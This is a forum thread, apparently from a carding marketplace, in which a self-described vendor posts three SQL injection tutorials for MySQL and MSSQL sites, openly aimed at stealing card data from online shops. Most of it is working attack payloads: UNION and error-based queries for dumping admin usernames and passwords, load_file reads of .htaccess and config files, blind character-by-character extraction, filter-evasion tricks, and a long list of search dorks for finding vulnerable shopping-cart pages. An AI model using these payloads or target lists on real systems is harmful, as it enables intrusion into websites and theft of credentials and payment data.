Register

If you already have an account with us, please use the login panel below to access your account.

Results 1 to 3 of 3
  1. #1
    Verified Vendors The Master's Avatar
    Location
    Russia
    Posts
    1,568

    SQL Tutorial [3\3]

    sql tutorial [3]
    hi folks..this time i m posting a good sql injection tutorial which i think will be a gem to sql injection learners who wish to hack their own shops for cvv ect ect. this sql injection tutorial will clear your most of sql injection doubts and will cleanly phase in an attack strategy for you.


    sql injection is defined as:
    "the act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end sql database running behind the website or application executes sql commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."


    background information


    * it is considered the most common web vulnerability today
    * it's a flaw in the web application--not the db, or the server
    * can be injected into: cookies, forms, and url parameters


    lesson facts


    * this lesson uses mysql syntax for all examples.
    * this lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
    * this lesson only provides sql injection examples for url parameters such it is such a large subject on it's own
    * this lesson gives small examples of filter evasion techniques


    the lesson


    some commands you will need to know:


    'union all select' : combines two or more select statements into one query and returns all rows


    'order by' : used to sort rows after a select statement is executed


    'load_file()' : loads a local file from the site or server examples would be .htaccess or /etc/passwd


    'char()' : used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file


    'concat()' : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (you will understand better later)


    '—' : a comment


    '/*' : another type of comment


    injection sql queries into url parameters


    so you've found a site: '


    http://www.site.com/index.php?id=5'


    and want to test if it's vulnerable to sql injections. begin by checking if you can execute some of your own queries, so try:


    /index.php?id=5 and 1=0--


    if after executing the above statement, nothing has happened and the page has remained the same, you can try:


    /index.php?id='


    if neither of those work, for the purposes of this tutorial move on to another site. otherwise, if a blank page showed up you just might be in luck!


    now we want to find how many columns and which ones are showing when the select statement is executed so we use:


    /index.php?id=5 order by 20


    if you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you're selecting from.


    example:


    /index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16


    returns an error, then we know that there are 15 columns in our select statement.


    the next statement will null the id=5 so the script only executes our commands and not it's own, and show us which columns we can extract data from:


    /index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--


    the comment comments out anything the script would append to the end of the statement so that only our statement is looked at.


    so now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. for this example let's pretend columns 5, 7, and 9 are showing.


    now we can begin gathering information!


    /index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,1 3,14,15--


    as you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? this is where concat() comes in:


    /index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58) ,version()),6,7,8,9,10,11,12,13,14,15--


    now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().


    the user() will usually give something like [email protected], but you may get lucky and get [email protected], in this instance you can try to brute force the ftp login. the version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!


    before we can check if we have load_file perms, we must get an fpd (full path disclosure) so we know exactly where the files are located that we're trying to open. below are some methods to get an fpd:


    /index.php?id[]=


    you could attempt to google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in google


    session cookie trick
    now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have:


    /index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--


    if you see the .htaccess file, congrats! you have load_file() perms. now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. another idea would be to load .htpasswd after finding it's location from .htaccess and then logging in to all the password-protected areas that you want to on the site.


    if you don't see the .htaccess file, i will include one more way to extract info by using sql injections.


    using information_schema.tables


    so you don't have load_file() perms? no problem, we can check for information_schema.tables.


    1) 'table_name' is the name of a table that exists in all information_schema tables on every site:


    /index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--


    if the site is showing information_schema.tables, the words 'character_sets' will appear in column 5. what can i do with character_sets you might be wondering. well, nothing that i'm going to show you, but you can find out other tables that exist on the site. the information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...then what do you think the information_schema.columns hold? that's right, a list of all the columns on the site. so rather than using just the above injection you could try any of the following:


    -/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables—


    selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time


    -/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6, 7,8,9,10,11,12,13,14,15 from information_schema.columns—


    selects all tables and columns that go with each table seperated by a colon


    2) if none of the above queries give you anything except for 'character_sets' you will have to use enumeration to determine the names of the other tables:


    /index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "character_sets"--


    then it would show the next table in line so you would modify the above to say:


    where table_name != "character_sets" and table_name != "nexttableinline"--


    until no more tables show, then you can do the same for the columns.


    3) now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. to extract that info from the table, use:


    /index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users--


    and you'll get the info you requested, of course you can modify that as you like such as:


    -/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--


    -/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='admin'


    replacing admin with the top user's name such as admin or owner etc..


    final tips


    with any luck, one of these methods has worked for you and you were able to accomplish your goal. however, if none of them worked, you can start guessing common table names and then columns:


    /index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users


    if the page shows up, you know the table exists and you can start guessing column names:


    /index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users


    if you get a username, good job you guessed a correct table and column, otherwise keep guessing.


    filter evasion techniques


    * you can url encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
    * rather then using 'union all select' try 'union all select' to see if the filter checks case
    * try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+' '+'se'+'lect'
    * combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
    * be creative


    conclusion


    as the old tuxedojesus would summarise it in the olden days -


    “thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.

  2. #2
    Verified Vendors The Master's Avatar
    Location
    Russia
    Posts
    1,568
    sql tutorial [2\2]
    we hacked lots of mysql sites ...nw its time to target microsoft.


    hope u will enjoy it....


    lets start...


    there are various types of sql injection for microsoft here as follows


    1)odbc error message attack with "convert"
    2)odbc error message attack with "having" and "group by"
    3)mssql injection with union attack
    4)mssql injection in web services (soap injection)
    5)mssql blind sql injection attack


    i will be explaining various methods of sqli's in my various tuts..
    so for now we will start with easiest methode of sqli with convert


    step 1:
    first we need to find a vulnerable site.


    by adding a single quote (') double quote ("") or a semicolon (dude click on the image to see full size greetings alboraaq-team to the field under test.


    eg
    iana &mdash; example domains'
    iana &mdash; example domains


    it's vulnerable in sql injection,if the output shows some error like this:


    [http response]------------------------------------------------------------------------------
    microsoft ole db provider for odbc drivers error '80040e14'
    [microsoft][odbc sql server driver][sql server]unclosed quotation mark before the
    character string ''.
    /news.asp, line 52
    [end http response]-------------------------------------------------------------------------


    also error could be something like below


    microsoft ole db provider for sql server error '80040e14 '
    open quotation mark after the character string ") and (volgorde> 0) order by volgorde '.
    ..../ main_rub.asp, line 4


    if the errors like above are shown then site could be vulnerable in sql


    also you can find vulnerable site from google dork.


    eg


    inurldude click on the image to see full size greetings alboraaq-teamage.asp?id=
    inurl:index.asp?sid=


    code:
    ".asp?bookid="
    ".asp?cart="
    ".asp?cartid="
    ".asp?catalogid="
    ".asp?category_list="
    ".asp?categoryid="
    ".asp?catid="
    ".asp?cid="
    ".asp?code_no="
    ".asp?code="
    ".asp?designer="
    ".asp?framecode="
    ".asp?id="
    ".asp?idcategory="
    ".asp?idproduct="
    ".asp?intcatalogid="
    ".asp?intprodid="
    ".asp?item_id="
    ".asp?item="
    ".asp?itemid="
    ".asp?maingroup="
    ".asp?misc="
    ".asp?newsid="
    ".asp?order_id="
    ".asp?p="
    ".asp?pid="
    ".asp?prodid="
    ".asp?product_id="
    ".asp?product="
    ".asp?productid="
    ".asp?showtopic="
    ".asp?sku="
    ".asp?storeid="
    ".asp?style_id="
    ".asp?styleid="
    ".asp?userid="
    "about.asp?cartid="
    "accinfo.asp?cartid="
    "acclogin.asp?cartid="
    "add.asp?bookid="
    "add_cart.asp?num="
    "addcart.asp?"
    "additem.asp"
    "add-to-cart.asp?id="
    "addtocart.asp?idproduct="
    "addtomylist.asp?prodid="
    "admineditproductfields.asp?intprodid="
    "advsearch_h.asp?idcategory="
    "affiliate.asp?id="
    "affiliate-agreement.cfm?storeid="
    "affiliates.asp?id="
    "ancillary.asp?id="
    "archive.asp?id="
    "article.asp?id="
    "aspx?pageid"
    "basket.asp?id="
    "book.asp?bookid="
    "book_list.asp?bookid="
    "book_view.asp?bookid="
    "bookdetails.asp?id="
    "browse.asp?catid="
    "browse_item_details.asp"
    "browse_item_details.asp?store_id="
    "buy.asp?"
    "buy.asp?bookid="
    "bycategory.asp?id="
    "cardinfo.asp?card="
    "cart.asp?action="
    "cart.asp?cart_id="
    "cart.asp?id="
    "cart_additem.asp?id="
    "cart_validate.asp?id="
    "cartadd.asp?id="
    "cat.asp?icat="
    "catalog.asp"
    "catalog.asp?catalogid="
    "catalog_item.asp?id="
    "catalog_main.asp?catid="
    "category.asp"
    "category.asp?catid="
    "category_list.asp?id="
    "categorydisplay.asp?catid="
    "checkout.asp?cartid="
    "checkout.asp?userid="
    "checkout_confirmed.asp?order_id="
    "checkout1.asp?cartid="
    "comersus_listcategoriesandproducts.asp?idcate gory ="
    "comersus_optemailtofriendform.asp?idproduct="
    "comersus_optreviewreadexec.asp?idproduct="
    "comersus_viewitem.asp?idproduct="
    "comments_form.asp?id="
    "contact.asp?cartid="
    "content.asp?id="
    "customerservice.asp?textid1="
    "default.asp?catid="
    "description.asp?bookid="
    "details.asp?bookid="
    "details.asp?press_release_id="
    "details.asp?product_id="
    "details.asp?service_id="
    "display_item.asp?id="
    "displayproducts.asp"
    "downloadtrial.asp?intprodid="
    "emailproduct.asp?itemid="
    "emailtofriend.asp?idproduct="
    "events.asp?id="
    "faq.asp?cartid="
    "faq_list.asp?id="
    "faqs.asp?id="
    "feedback.asp?title="
    "freedownload.asp?bookid="
    "fulldisplay.asp?item="
    "getbook.asp?bookid="
    "getitems.asp?itemid="
    "giftdetail.asp?id="
    "help.asp?cartid="
    "home.asp?id="
    "index.asp?cart="
    "index.asp?cartid="
    "index.asp?id="
    "info.asp?id="
    "item.asp?eid="
    "item.asp?item_id="
    "item.asp?itemid="
    "item.asp?model="
    "item.asp?prodtype="
    "item.asp?shopcd="
    "item_details.asp?catid="
    "item_list.asp?maingroup"
    "item_show.asp?code_no="
    "itemdesc.asp?cartid="
    "itemdetail.asp?item="
    "itemdetails.asp?catalogid="
    "learnmore.asp?cartid="
    "links.asp?catid="
    "list.asp?bookid="
    "list.asp?catid="
    "listcategoriesandproducts.asp?idcategory="
    "modline.asp?id="
    "myaccount.asp?catid="
    "news.asp?id="
    "order.asp?bookid="
    "order.asp?id="
    "order.asp?item_id="
    "orderform.asp?cart="
    "page.asp?partid="
    "payment.asp?cartid="
    "pdetail.asp?item_id="
    "powersearch.asp?cartid="
    "price.asp"
    "privacy.asp?cartid="
    "prodbycat.asp?intcatalogid="
    "prodetails.asp?prodid="
    "prodlist.asp?catid="
    "product.asp?bookid="
    "product.asp?intprodid="
    "product_info.asp?item_id="
    "productdetails.asp?idproduct="
    "productdisplay.asp"
    "productinfo.asp?item="
    "productlist.asp?viewtype=category&categoryid= "
    "productpage.asp"
    "products.asp?id="
    "products.asp?keyword="
    "products_category.asp?categoryid="
    "products_detail.asp?categoryid="
    "productsbycategory.asp?intcatalogid="
    "prodview.asp?idproduct="
    "promo.asp?id="
    "promotion.asp?catid="
    "pview.asp?item="
    "resellers.asp?idcategory="
    "results.asp?cat="
    "savecart.asp?cartid="
    "search.asp?cartid="
    "searchcat.asp?search_id="
    "select_item.asp?id="
    "services.asp?id="
    "shippinginfo.asp?cartid="
    "shop.asp?a="
    "shop.asp?action="
    "shop.asp?bookid="
    "shop.asp?cartid="
    "shop_details.asp?prodid="
    "shopaddtocart.asp"
    "shopaddtocart.asp?catalogid="
    "shopbasket.asp?bookid="
    "shopbycategory.asp?catid="
    "shopcart.asp?title="
    "shopcreatorder.asp"
    "shopcurrency.asp?cid="
    "shopdc.asp?bookid="
    "shopdisplaycategories.asp"
    "shopdisplayproduct.asp?catalogid="
    "shopdisplayproducts.asp"
    "shopexd.asp"
    "shopexd.asp?catalogid="
    "shopping_basket.asp?cartid="
    "shopprojectlogin.asp"
    "shopquery.asp?catalogid="
    "shopremoveitem.asp?cartid="
    "shopreviewadd.asp?id="
    "shopreviewlist.asp?id="
    "shopsearch.asp?categoryid="
    "shoptellafriend.asp?id="
    "shopthanks.asp"
    "shopwelcome.asp?title="
    "show_item.asp?id="
    "show_item_details.asp?item_id="
    "showbook.asp?bookid="
    "showstore.asp?catid="
    "shprodde.asp?sku="
    "specials.asp?id="
    "store.asp?id="
    "store_bycat.asp?id="
    "store_listing.asp?id="
    "store_viewproducts.asp?cat="
    "store-details.asp?id="
    "storefront.asp?id="
    "storefronts.asp?title="
    "storeitem.asp?item="
    "storeredirect.asp?id="
    "subcategories.asp?id="
    "tek9.asp?"
    "template.asp?action=item&pid="
    "topic.asp?id="
    "tuangou.asp?bookid="
    "type.asp?itype="
    "updatebasket.asp?bookid="
    "updates.asp?id="
    "view.asp?cid="
    "view_cart.asp?title="
    "view_detail.asp?id="
    "viewcart.asp?cartid="
    "viewcart.asp?userid="
    "viewcat_h.asp?idcategory="
    "viewevent.asp?eventid="
    "viewitem.asp?recor="
    "viewprd.asp?idcategory="
    "viewproduct.asp?misc="
    "votelist.asp?item_id="
    "whatsnew.asp?idcategory="
    "wsancillary.asp?id="
    "wspages.asp?id="
    step 2:


    now we got our vulnerable website.
    convert command is used to convert between two data types and when the specific
    data cannot convert to another type the error will be returned.


    now we start with our assessment by finding mssql_version, db_name.


    iana &mdash; example domains


    [http response]-------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'microsoft sql server 2005 - 9.00.4053.00
    (intel x86) may 26 2009 14:24:20 copyright (c) 1988-2005 microsoft corporation
    standard edition on windows nt 5.2 (build 3790: service pack 2) ' to data type int.


    /includes/templates/header.asp, line 21


    -----------------------------------------------------------


    we know now,its a microsoft sql server 2005 n os (windows 2003 server) (build 3790: service pack 2)


    let's go to enumerate db_name.


    iana &mdash; example domains


    [http response]--------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'ipc' to data type int.


    /includes/templates/header.asp, line 21
    ------------------------------------------------------------


    the data base name is ipc.


    iana &mdash; example domains


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'ipcdc' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------


    the use operating database is ipcdc....


    step 3:
    now lets find tables in database


    iana &mdash; example domains e_name+from+information_schema.tables))--


    "information_schema.tables" stores information about tables in databases and there is a field called "table_name"
    which stores names of each table."select top 1" will show first table in database.
    the result of this request is something like this:


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'sitestatus' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------


    therefore, we know the first table = "sitestatus", from this error. the next step is looking for the second table.
    we only put where clause append the query in above request.
    iana &mdash; example domains e_name+from+information_schema.tables+where+table_ name+not+in+('sitestatus')))--


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'headergraphic' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------


    second table 'headergraphic'
    iana &mdash; example domains e_name+from+information_schema.tables+where+table_ name+not+in+('sitestatus','headergraphic')))--


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'admin' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    third table 'admin'


    like this you will get each table name from the error.
    iana &mdash; example domains e_name+from+information_schema.tables+where+table_ name+not+in+('sitestatus','headergraphic','admin') ))--


    if the query returns something like this.


    [http response]----------------------------------------
    adodb.field error '800a0bcd'
    either bof or eof is true, or the current record has been deleted. requested operation requires a current record.
    /page.asp, line 22


    -----------------------------------------------------------------


    it means database contains only 3 tables 'sitestatus','headergraphic' n 'admin'.


    step 4:
    now we are all set.....and we will find columns in admin table


    we merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
    but we have to add "table_name" in where cluase in order to specify the table which we will pull column names from.
    iana &mdash; example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'))--


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'username' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    iana &mdash; example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--


    the response will be
    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'passwd' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    so 2nd column is 'passwd'




    do this like we did url manipulation for tables....
    dont forget to add where clause.
    untill u get error like this
    [http response]----------------------------------------
    adodb.field error '800a0bcd'
    either bof or eof is true, or the current record has been deleted. requested operation requires a current record.
    /page.asp, line 22


    -----------------------------------------------------------------


    step 5: retrieving usename n password etc


    now lets see what we got from above


    table_name: 'admin','sitestatus' n 'headergraphic'


    here we are interestedin 'admin'.so we found columns fo 'admin'


    column_name:'username' n 'passwd'


    lets do our work now


    iana &mdash; example domains name+from+admin))--
    you will get first username in terms of error
    eg sa_admin
    iana &mdash; example domains wd+from+admin))--


    you will get passwd.
    eg comic123




    so u own .....mssql server wid


    username: sa_admin
    password:comic123
    [note:
    1) you can use and/or both
    2) dnt forget , (comma) after 'int' in convert()
    3) in error after ' (upper comma) is your table_name of column_name or etc
    4)you can enemerate more usernames n passwords by using 'not' command

  3. #3
    Verified Vendors The Master's Avatar
    Location
    Russia
    Posts
    1,568
    sql tutorial [1\1]
    in this tutorial i will describe how sql injection works and how to
    use it to get some useful information.


    first of all: what is sql injection?
    it’s one of the most common vulnerability in web applications today.
    it allows attacker to execute database query in url and gain access
    to some confidential information etc…(in shortly).


    1.sql injection (classic or error based or whatever you call it)
    2.blind sql injection (the harder part)


    so let’s start with some action


    1). check for vulnerability
    let’s say that we have some site like this
    http://www.site.com/news.php?id=5
    now to test if is vulrnable we add to the end of url ‘ (quote),
    and that would be http://www.site.com/news.php?id=5′
    so if we get some error like
    “you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right etc…”
    or something similar
    that means is vulrnable to sql injection


    2). find the number of columns
    to find number of columns we use statement order by (tells database how to order the result)
    so how to use it? well just incrementing the number until we get an error.
    http://www.site.com/news.php?id=5 order by 1/* <– no error
    http://www.site.com/news.php?id=5 order by 2/* <– no error
    http://www.site.com/news.php?id=5 order by 3/* <– no error
    http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this unknown column ‘4′ in ‘order clause’ or something like that)
    that means that the it has 3 columns, cause we got an error on 4.


    3). check for union function
    with union we can select more data in one sql statement.
    so we have
    http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
    if we see some numbers on screen, i.e 1 or 2 or 3 then the union works


    4). check for mysql version
    http://www.site.com/news.php?id=5 union all select 1,2,3/* note: if /* not working or you get some error, then try –
    it’s a comment and it’s important for our query to work properly.
    let say that we have number 2 on the screen, now to check for version
    we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
    it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
    if you get an error “union + illegal mix of collations (implicit + coercible) …”
    i didn’t see any paper covering this problem, so i must write it
    what we need is convert() function
    i.e.
    http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
    or with hex() and unhex()
    i.e.
    http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
    and you will get mysql version


    5). getting table and column name
    well if the mysql version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for mysql > 5 version.
    we must guess table and column name in most cases.
    common table names are: user/s, admin/s, member/s …
    common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
    i.e would be
    http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good )
    we know that table admin exists…
    now to check column names.
    http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
    we get username displayed on screen, example would be admin, or superadmin etc…
    now to check if column password exists
    http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
    we seen password on the screen in hash or plain-text, it depends of how the database is set up
    i.e md5 hash, mysql hash, sha1…
    now we must complete query to look nice
    for that we can use concat() function (it joins strings)
    i.e
    http://www.site.com/news.php?id=5 union all select 1,concat(username,0×3a,password),3 from admin/*
    note that i put 0×3a, its hex value for : (so 0×3a is hex value for colon)
    (there is another way for that, char(58), ascii value for : )
    http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
    now we get dislayed usernameassword on screen, i.e admin:admin or admin:somehash
    when you have this, you can login like admin or some superuser
    if can’t guess the right table name, you can always try mysql.user (default)
    it has user i password columns, so example would be
    http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,password),3 from mysql.user/*


    6). mysql 5
    like i said before i’m gonna explain how to get table and column names
    in mysql > 5.
    for this we need information_schema. it holds all tables and columns in database.
    to get tables we use table_name and information_schema.tables.
    i.e
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
    here we replace the our number 2 with table_name to get the first table from information_schema.tables
    displayed on the screen. now we must add limit to the end of query to list out all tables.
    i.e
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
    note that i put 0,1 (get 1 result starting from the 0th)
    now to view the second table, we change limit 0,1 to limit 1,1
    i.e
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
    the second table is displayed.
    for third table we put limit 2,1
    i.e
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
    keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…
    to get the column names the method is the same.
    here we use column_name and information_schema.columns
    the method is same as above so example would be
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
    the first column is diplayed.
    the second one (we change limit 0,1 to limit 1,1)
    ie.
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
    the second column is displayed, so keep incrementing until you get something like
    username,user,login, password, pass, passwd etc…
    if you wanna display column names for specific table use this query. (where clause)
    let’s say that we found table users.
    i.e
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
    now we get displayed column name in table users. just using limit we can list all columns in table users.
    note that this won’t work if the magic quotes is on.
    let’s say that we found colums user, pass and email.
    now to complete query to put them all together
    for that we use concat() , i decribe it earlier.
    i.e
    http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,pass,0×3a,email) from users/*
    what we get here is userass:email from table users.
    example: admin:hash:[email protected]
    that’s all in this part, now we can proceed on harder part


    2. blind sql injection
    blind injection is a little more complicated the classic injection but it can be done
    i must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it
    let’s start with advanced stuff.
    i will be using our example
    http://www.site.com/news.php?id=5
    when we execute this, we see some page and articles on that page, pictures etc…
    then when we want to test it for blind sql injection attack
    http://www.site.com/news.php?id=5 and 1=1 <— this is always true
    and the page loads normally, that’s ok.
    now the real test
    http://www.site.com/news.php?id=5 and 1=2 <— this is false
    so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.


    1) get the mysql version
    to get the version in blind attack we use substring
    i.e


    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4


    this should return true if the version of mysql is 4.


    replace 4 with 5, and if query return true then the version is 5.


    i.e


    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5


    2) test if subselect works
    when select don’t work then we use subselect
    i.e
    http://www.site.com/news.php?id=5 and (select 1)=1
    if page loads normally then subselects work.
    then we gonna see if we have access to mysql.user
    i.e
    http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
    if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and outfile.


    3). check table and column names
    this is part when guessing is the best friend
    i.e.
    http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
    then if the page loads normally without content missing, the table users exits.
    if you get false (some article missing), just change table name until you guess the right one
    let’s say that we have found that table name is users, now what we need is column name.
    the same as table name, we start guessing. like i said before try the common names for columns.
    i.e
    http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
    if the page loads normally we know that column name is password (if we get false then try common names or just guess)
    here we merge 1 with the column password, then substring returns the first character (,1,1)


    4). pull data from database
    we found table users i columns username password so we gonna pull characters from that.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),1,1))>80
    ok this here pulls the first character from first user in table users.
    substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
    and then compare it with simbol greater then > .
    so if the ascii char greater then 80, the page loads normally. (true)
    we keep trying until we get false.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),1,1))>95
    we get true, keep incrementing
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),1,1))>98
    true again, higher
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),1,1))>99
    false!!!
    so the first character in username is char(99). using the ascii converter we know that char(99) is letter ‘c’.
    then let’s check the second character.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),2,1))>99
    note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),1,1))>99
    true, the page loads normally, higher.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),1,1))>107
    false, lower number.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),1,1))>104
    true, higher.
    http://www.site.com/news.php?id=5 and ascii(substring((select concat(username,0×3a,password) from users limit 0,1),1,1))>105
    false!!!
    we know that the second character is char(105) and that is ‘i’. we have ‘ci’ so far
    so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).


    there are some tools for blind sql injection, i think sqlmap is the best, but i’m doing everything manually,
    cause that makes you better sql injector
    hope you learned something from this paper.
    have fun!

 

 

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •